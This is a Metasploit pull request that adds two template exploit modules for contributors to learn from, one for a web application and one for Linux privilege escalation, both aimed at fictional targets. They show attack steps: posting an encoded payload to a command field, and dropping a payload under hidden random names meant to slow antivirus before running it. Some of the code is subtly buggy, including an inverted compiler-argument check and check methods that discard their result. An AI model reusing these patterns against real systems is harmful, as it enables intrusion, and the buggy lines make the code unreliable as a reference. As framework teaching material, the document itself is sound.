### PR TITLE
additional example exploits

### DIFF
--- a/lib/msf/core/modules/loader/directory.rb
+++ b/lib/msf/core/modules/loader/directory.rb
@@ -42,7 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
           entry_descendant_pathname = Pathname.new(entry_descendant_path)
           relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
           relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
-          next if ['example.rb', 'example_linux_priv_esc.rb', 'example_webapp.rb'].include? File::basename(relative_entry_descendant_path)
+          next if File::basename(relative_entry_descendant_path).start_with?('example')
           # The module_reference_name doesn't have a file extension
           module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
 

--- a/lib/msf/core/modules/loader/directory.rb
+++ b/lib/msf/core/modules/loader/directory.rb
@@ -42,7 +42,7 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base
           entry_descendant_pathname = Pathname.new(entry_descendant_path)
           relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
           relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
-          next if File::basename(relative_entry_descendant_path) == "example.rb"
+          next if ['example.rb', 'example_linux_priv_esc.rb', 'example_webapp.rb'].include? File::basename(relative_entry_descendant_path)
           # The module_reference_name doesn't have a file extension
           module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)
 

--- a/modules/exploits/example.rb
+++ b/modules/exploits/example.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         # The Name should be just like the line of a Git commit - software name,
-        # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
+        # vuln type, class. Preferably apply
         # some search optimization so people can actually find the module.
         # We encourage consistency between module name and file name.
         'Name'           => 'Sample Exploit',

--- a/modules/exploits/example.rb
+++ b/modules/exploits/example.rb
@@ -58,8 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
             ]
           ],
         'DisclosureDate' => "Apr 1 2013",
-        # Note that this is by index, rather than name. It's generally easiest
-        # just to put the default at the beginning of the list and skip this
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
         # entirely.
         'DefaultTarget'  => 0
       )

--- a/modules/exploits/example_linux_priv_esc.rb
+++ b/modules/exploits/example_linux_priv_esc.rb
@@ -6,7 +6,7 @@
 ###
 #
 # This exploit sample shows how an exploit module could be written to exploit
-# a bug in an arbitrary command on a linux server for priv esc.
+# a bug in a command on a linux computer for priv esc.
 #
 ###
 class MetasploitModule < Msf::Exploit::Remote
@@ -80,24 +80,32 @@ class MetasploitModule < Msf::Exploit::Remote
   # Simplify uploading and chmoding a file
   def upload_and_chmodx(path, data)
     upload path, data
-    cmd_exec "chmod +x '#{path}'"
+    chmod path
+    register_file_for_cleanup path
   end
 
   # Simplify uploading and compiling a file
-  def upload_and_compile(path, data)
+  def upload_and_compile(path, data, gcc_args='')
     upload "#{path}.c", data
+
     gcc_cmd = "gcc -o #{path} #{path}.c"
     if session.type.eql? 'shell'
       gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
     end
 
+    if gcc_args.to_s.blank?
+      gcc_cmd << " #{gcc_args}"
+    end
+
     output = cmd_exec gcc_cmd
+
     unless output.blank?
       print_error output
       fail_with Failure::Unknown, "#{path}.c failed to compile"
     end
 
-    cmd_exec "chmod +x #{path}"
+    register_file_for_cleanup path
+    chmod path
   end
 
   # Pull the exploit binary or file (.c typically) from our system
@@ -164,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
-    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
     executable_path = "#{base_dir}/#{executable_name}"
     if live_compile?
       vprint_status 'Live compiling exploit on system...'
@@ -176,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Upload payload executable
-    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
     upload_and_chmodx payload_path, generate_payload_exe
 
     # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
@@ -185,12 +193,5 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status "Launching exploit..."
     output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
     output.each_line { |line| vprint_status line.chomp }
-
-    # Remove the files we wrote to the system
-    print_status "Cleaning up #{payload_path} and #{executable_path}..."
-    rm_f executable_path
-    rm_f payload_path
-
-
   end
 end

--- a/modules/exploits/example_linux_priv_esc.rb
+++ b/modules/exploits/example_linux_priv_esc.rb
@@ -33,11 +33,28 @@ class MetasploitModule < Msf::Exploit::Remote
           in an linux command for priv esc.
         ),
         'License'        => MSF_LICENSE,
-        'Author'         => ['h00die'],
+        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
+        # Add reference to additional authors, like those creating original proof of concepts or
+        # reference materials.
+        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+        'Author'         =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # msf module
+            'researcher' # original PoC, analysis
+          ],
         'Platform'       => [ 'linux' ],
+        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but the exploit
+        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
+        # A full list is available in lib/msf/core/payload/uuid.rb
         'Arch'           => [ ARCH_X86, ARCH_X64 ],
+        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
+        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
+        # test both to ensure compatibility.
         'SessionTypes'   => [ 'shell', 'meterpreter' ],
         'Targets'        => [[ 'Auto', {} ]],
+        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
+        # since privilege escalation modules typically result in elevated privileges, this is
+        # generally set to true
         'Privileged'     => true,
         'References'     =>
           [
@@ -47,8 +64,8 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'CVE', '1978-1234']
           ],
         'DisclosureDate' => "Nov 29 2019",
-        # Note that this is by index, rather than name. It's generally easiest
-        # just to put the default at the beginning of the list and skip this
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
         # entirely.
         'DefaultTarget'  => 0
       )

--- a/modules/exploits/example_linux_priv_esc.rb
+++ b/modules/exploits/example_linux_priv_esc.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         # The Name should be just like the line of a Git commit - software name,
-        # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
+        # vuln type, class. Preferably apply
         # some search optimization so people can actually find the module.
         # We encourage consistency between module name and file name.
         'Name'           => 'Sample Linux Priv Esc',

--- a/modules/exploits/example_linux_priv_esc.rb
+++ b/modules/exploits/example_linux_priv_esc.rb
@@ -1,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This exploit sample shows how an exploit module could be written to exploit
+# a bug in an arbitrary command on a linux server for priv esc.
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name'           => 'Sample Linux Priv Esc',
+        'Description'    => %q(
+            This exploit module illustrates how a vulnerability could be exploited
+          in an linux command for priv esc.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['h00die'],
+        'Platform'       => [ 'linux' ],
+        'Arch'           => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        => [[ 'Auto', {} ]],
+        'Privileged'     => true,
+        'References'     =>
+          [
+            [ 'OSVDB', '12345' ],
+            [ 'EDB', '12345' ],
+            [ 'URL', 'http://www.example.com'],
+            [ 'CVE', '1978-1234']
+          ],
+        'DisclosureDate' => "Nov 29 2019",
+        # Note that this is by index, rather than name. It's generally easiest
+        # just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+    # We typically drop a pre-compiled exploit to disk and run it, however the option
+    # is left for the user to gcc it themselves if there is an add OS or other dependency
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
+    ]
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  # Simplify and standardize uploading a file
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+  end
+
+  # Simplify uploading and chmoding a file
+  def upload_and_chmodx(path, data)
+    upload path, data
+    cmd_exec "chmod +x '#{path}'"
+  end
+
+  # Simplify uploading and compiling a file
+  def upload_and_compile(path, data)
+    upload "#{path}.c", data
+    gcc_cmd = "gcc -o #{path} #{path}.c"
+    if session.type.eql? 'shell'
+      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"
+    end
+
+    output = cmd_exec gcc_cmd
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    cmd_exec "chmod +x #{path}"
+  end
+
+  # Pull the exploit binary or file (.c typically) from our system
+  def exploit_data(file)
+    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'DOES_NOT_EXIST', file)
+  end
+
+  # If we're going to live compile on the system, check gcc is installed
+  def live_compile?
+    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+    if has_gcc?
+      vprint_good 'gcc is installed'
+      return true
+    end
+
+    unless datastore['COMPILE'].eql? 'Auto'
+      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
+    end
+  end
+
+  def check
+    # Check the kernel version to see if its in a vulnerable range
+    release = kernel_release
+    if Gem::Version.new(release.split('-').first) > Gem::Version.new('4.14.11') ||
+       Gem::Version.new(release.split('-').first) < Gem::Version.new('4.0')
+      vprint_error "Kernel version #{release} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "Kernel version #{release} appears to be vulnerable"
+
+    # Check the app is installed and the version, debian based example
+    package = cmd_exec('dpkg -l example | grep \'^ii\'')
+    if package && package.include?('1:2015.3.14AR.1-1build1')
+      print_good("Vulnerable app version #{package} detected")
+      CheckCode::Appears
+    end
+    CheckCode::Safe
+  end
+
+  #
+  # The exploit method drops a payload file to the system, then either compiles and runs
+  # or just runs the exploit on the system.
+  #
+  def exploit
+    # First check the system is vulnerable, or the user wants to run regardless
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # Check if we're already root
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      end
+    end
+
+    # Make sure we can write our exploit and payload to the remote system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
+    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile executable_path, strip_comments(exploit_data('example.c'))
+      rm_f "#{executable_path}.c"
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx executable_path, exploit_data('example')
+    end
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
+    # output from the exploit being run, they can optionally see it
+    timeout = 30
+    print_status "Launching exploit..."
+    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+
+    # Remove the files we wrote to the system
+    print_status "Cleaning up #{payload_path} and #{executable_path}..."
+    rm_f executable_path
+    rm_f payload_path
+
+
+  end
+end

--- a/modules/exploits/example_webapp.rb
+++ b/modules/exploits/example_webapp.rb
@@ -1,0 +1,145 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This exploit sample shows how an exploit module could be written to exploit
+# a bug in an arbitrary web server
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  #
+  # This exploit affects a webapp, so we need to import HTTP Client
+  # to easily interact with it.
+  #
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name'           => 'Sample Webapp Exploit',
+        'Description'    => %q(
+            This exploit module illustrates how a vulnerability could be exploited
+          in a webapp.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['h00die'],
+        'References'     =>
+          [
+            [ 'OSVDB', '12345' ],
+            [ 'EDB', '12345' ],
+            [ 'URL', 'http://www.example.com'],
+            [ 'CVE', '1978-1234']
+          ],
+        'Platform'       => ['python'],
+        'Privileged'     => false,
+        'Arch'           => ARCH_PYTHON,
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DisclosureDate' => "Apr 1 2013",
+        # Note that this is by index, rather than name. It's generally easiest
+        # just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+    # set the default port, and a URI that a user can set if the app isn't installed to the root
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
+        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
+      ], self.class
+    )
+  end
+
+  #
+  # The sample exploit checks the index page to verify the version number is exploitable
+  # we use a regex for the version number
+  #
+  def check
+    # we want to handle cases where the port/target isn't open/listening gracefully
+    begin
+      # only catch the response if we're going to use it, in this case we do for the version
+      # detection.
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'index.php'),
+        'method'    => 'GET'
+      )
+      # gracefully handle if res comes back as nil, since we're not guaranteed a response
+      # also handle if we get an unexpected HTTP response code
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 200
+
+      # here we're looking through html for the version string, similar to:
+      # Version 1.2
+      /Version: (?<version>[\d]{1,2}\.[\d]{1,2}<\/td>/ =~ res.body
+
+      if version && Gem::Version.new(version) <= Gem::Version.new('1.3')
+        vprint_good("Version Detected: #{version}")
+        Exploit::CheckCode::Appears
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  #
+  # The exploit method attempts a login, then attempts to throw a command execution
+  # at a web page through a POST variable
+  #
+  def exploit
+    begin
+      # attempt a login. In this case we show basic auth, and a POST to a fake username/password
+      # simply to show how both are done
+      vprint_status('Attempting login')
+      # since we will check res to see if auth was a success, make sure to capture the return
+      res = send_request_cgi(
+        'uri'           => '/login.html',
+        'method'        => 'POST',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+        'vars_post'     => {
+          'username' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD']
+        }
+      )
+
+      # a valid login will give us a 301 redirect to /home.html so check that.
+      # ALWAYS assume res could be nil and check it first!!!!!
+      if res && res.code != 301
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
+      end
+
+      # grab our valid cookie
+      cookie = res.get_cookies
+      # we don't care what the response is, so don't bother saving it from send_request_cgi
+      vprint_status('Attempting exploit')
+      send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'command.html'),
+        'method'    => 'POST',
+        'cookie'    => cookie,
+        'vars_post'  =>
+        {
+          'cmd_str' => payload.encoded
+        }
+      )
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+
+  end
+end

--- a/modules/exploits/example_webapp.rb
+++ b/modules/exploits/example_webapp.rb
@@ -32,7 +32,15 @@ class MetasploitModule < Msf::Exploit::Remote
           in a webapp.
         ),
         'License'        => MSF_LICENSE,
-        'Author'         => ['h00die'],
+        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
+        # Add reference to additional authors, like those creating original proof of concepts or
+        # reference materials.
+        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+        'Author'         =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # msf module
+            'researcher' # original PoC, analysis
+          ],
         'References'     =>
           [
             [ 'OSVDB', '12345' ],
@@ -40,16 +48,23 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'URL', 'http://www.example.com'],
             [ 'CVE', '1978-1234']
           ],
+        # platform refers to the type of platform.  For webapps, this is typically the language of the webapp.
+        # js, php, python, nodejs are common, this will effect what payloads can be matched for the exploit.
+        # A full list is available in lib/msf/core/payload/uuid.rb
         'Platform'       => ['python'],
+        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
         'Privileged'     => false,
+        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but for webapps typically
+        # this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples
+        # A full list is available in lib/msf/core/payload/uuid.rb
         'Arch'           => ARCH_PYTHON,
         'Targets'        =>
           [
             [ 'Automatic Target', {}]
           ],
         'DisclosureDate' => "Apr 1 2013",
-        # Note that this is by index, rather than name. It's generally easiest
-        # just to put the default at the beginning of the list and skip this
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
         # entirely.
         'DefaultTarget'  => 0
       )
@@ -81,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # gracefully handle if res comes back as nil, since we're not guaranteed a response
       # also handle if we get an unexpected HTTP response code
       fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
-      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200
 
       # here we're looking through html for the version string, similar to:
       # Version 1.2

--- a/modules/exploits/example_webapp.rb
+++ b/modules/exploits/example_webapp.rb
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # here we're looking through html for the version string, similar to:
       # Version 1.2
-      /Version: (?<version>[\d]{1,2}\.[\d]{1,2}<\/td>/ =~ res.body
+      /Version: (?<version>[\d]{1,2}\.[\d]{1,2})<\/td>/ =~ res.body
 
       if version && Gem::Version.new(version) <= Gem::Version.new('1.3')
         vprint_good("Version Detected: #{version}")

--- a/modules/exploits/example_webapp.rb
+++ b/modules/exploits/example_webapp.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
       update_info(
         info,
         # The Name should be just like the line of a Git commit - software name,
-        # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
+        # vuln type, class. Preferably apply
         # some search optimization so people can actually find the module.
         # We encourage consistency between module name and file name.
         'Name'           => 'Sample Webapp Exploit',


### PR DESCRIPTION
During my 2 bsides talks to help motivate the community to become contributors, I referenced the wiki article and the exploit [example.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/example.rb).
I realized that we often deal with `res` either not being checked for `nil` or `vars_post` type stuff for webapps.  For linux priv esc, @bcoles has done just a fantastic job of libraries and environment checks that need to be in all modules possible.

This PR adds 2 new example exploit files, one for webapps, and one for linux priv escs, in the hopes that they could be referenced by new devs to avoid common mistakes.